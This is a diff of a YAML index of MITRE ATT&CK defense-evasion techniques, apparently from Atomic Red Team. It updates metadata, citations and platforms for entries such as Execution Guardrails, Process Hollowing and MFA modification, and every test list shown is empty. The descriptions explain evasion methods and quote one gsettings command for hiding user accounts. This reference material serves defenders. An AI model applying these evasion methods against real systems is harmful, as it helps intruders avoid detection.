+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9583,11 +9668,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9735,7 +9820,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
